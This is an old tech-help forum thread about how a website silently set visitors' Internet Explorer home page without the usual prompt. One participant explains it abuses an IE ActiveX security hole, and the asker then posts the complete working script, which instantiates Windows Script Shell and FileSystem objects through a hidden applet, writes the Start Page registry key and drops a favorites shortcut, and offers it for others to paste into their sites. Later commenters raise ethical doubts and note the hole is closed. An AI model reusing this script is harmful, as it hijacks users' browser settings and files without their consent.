• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 267
  • Last Modified:

Set home page without prompt?

I noticed, that page www.easywarez.com sets default home page in MS Internet Explorer without that familiar "Would you like to set your home page..." prompt. I checked their sources but I was not able to find out how they do it.

Could someone please tell me how this is done?

0
jakac
Asked:
jakac
1 Solution
 
djbusychildCommented:
what ARE you doing at a site like that??? --;

No there's no way of doing that without prompting unless you have downloaded an activex control from them or you're running their ste on HTA.

I just went to the site and they do prompt me for setting their page as my home.
0
 
dfc106Commented:
They prompted me too, but the homepage had already been set by then.  And I hadn't downloaded any activeX components.  Added a bookmark too.  Can't figure out how they did the homepage though.
0
 
djbusychildCommented:
well, it didn't work for me. My homepage is still intact. mayeb your computer has been had. ;)
0
Ultimate Tool Kit for Technology Solution Provider

Broken down into practical pointers and step-by-step instructions, the IT Service Excellence Tool Kit delivers expert advice for technology solution providers. Get your free copy now.

 
daniel_cCommented:
It didn't work for me either... :)
It still prompted me, and asked for permission to set as my homepage.
0
 
geteCommented:
The page heavily uses Microsoft technology so it will only work for IE. It exploits some of security holes that IE had, that's why maybe it won't work for people regularly update their system. Basically what it does is creating a Windows Script Shell ActiveX object (which is should be marked unsafe I think) in the client-side script, and then using that object, it will modify your registry (the current user/HKCU) where your default page setting resides. And then it also create a File System Object to add a link file directly into your Favorites folder.

In that website, the code is called from the left frame's page using external encoded .js file. You can download the .js by typing directly in the URL bar and try to find the Windows Scripting decoder floating around in the net.

Note: this method is considered a security hole exploitation, so actually it wouldn't be nice to do those things to your visitors.
0
 
jakacAuthor Commented:
OK I did everything gete told me to do and now I perfectly understand how it is done...
Here's the whole script if anyone wants to have it. Just save following into something.js and call it from your html with <script language="JavaScript" src="something.js"></script>
This script will set user's default homepage and it will add your page to favorites. This script was tested and works for IE 5 and also IE 6 preview.


---

     document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");

     if (navigator.appName == 'Netscape') var language = navigator.language;
     else var language = navigator.browserLanguage;

     function AddFavLnk(loc, DispName, SiteURL) {
       var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
       Shor.TargetPath = SiteURL;
       Shor.Save();
     }

     function f() {
       try {
      a1=document.applets[0];
      a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Shl = a1.GetObject();
      a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
      a1.createInstance();
      FSO = a1.GetObject();
      a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Net = a1.GetObject();
      try {
          if (!language.indexOf('es') >-1) Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.yourpage.com/");
// this will set user your page as a default homepage

          var WF, Shor, loc;
          WF = FSO.GetSpecialFolder(0);
          if (language.indexOf('es') >-1) loc = WF + "\\favoritos";
          else if (language.indexOf('de') >-1) loc = WF + "\\favoriten";
          else if (language.indexOf('sv') >-1) loc = WF + "\\favoriter";
          else if (language.indexOf('it') >-1) loc = WF + "\\preferiti";
          else if (language.indexOf('fr') >-1) loc = WF + "\\favoris";
          else if (language.indexOf('da') >-1) loc = WF + "\\oversigt";
          else loc = WF + "\\Favorites";
          if(!FSO.FolderExists(loc)) {
            if (language.indexOf('es') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favoritos";
            else if (language.indexOf('de') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriten";
            else if (language.indexOf('sv') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoriter";
            else if (language.indexOf('it') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\preferiti";
            else if (language.indexOf('fr') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\favoris";
            else if (language.indexOf('da') >-1) loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\oversigt";
            else loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
            if(!FSO.FolderExists(loc)) {
              return;
            }
          }
          AddFavLnk(loc, "title of your homepage", "http://www.urlofyourpage.com/");
// this will add your page to users favorites

      }
      catch(e) {}
       }
       catch(e) {}
     }

     function init() {
       setTimeout("f()", 1000);
     }

     init();

---
0
 
geteCommented:
Ahem, actually I didn't expect the whole thing to be posted in this open forum since it's using one of IE security hole. I hope everyone sees it is able to see the methods just for the sake of learning and wisely not putting that to 'forcely' advertise our site.

Anyway, I think the matter is clear now, and since imho I'm the closest one to give the direction, I don't mind if you decided to delete this question because it's quite a sensitive issue ;) But if you think the otherwise to put it in the PAQ, I don't mind either since this is also a learning media, we learn together.

Keep up the good discussion spirit..
0
 
djbusychildCommented:
why would anybody want to use this exploit?
0
 
bcdeveloperCommented:
I am trying to use this as a means of setting the homepage on 500 computers on our company intranet.

everyone is or will be using at least IE 5.0, no netscape users.  

However, I am having trouble getting this to work.  

Gete did you write this? Might you be willing to contact me about how to set it up.  

I can be reached at kenneth.ketsdever@smfbc.org
0
 
Michel PlungjanIT ExpertCommented:
Did you try the policy editor from Microsoft ???

Ps: this exploit has been closed or at least is alerting warnings
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Free Tool: ZipGrep

ZipGrep is a utility that can list and search zip (.war, .ear, .jar, etc) archives for text patterns, without the need to extract the archive's contents.

One of a set of tools we're offering as a way to say thank you for being a part of the community.

Tackle projects and never again get stuck behind a technical roadblock.
Join Now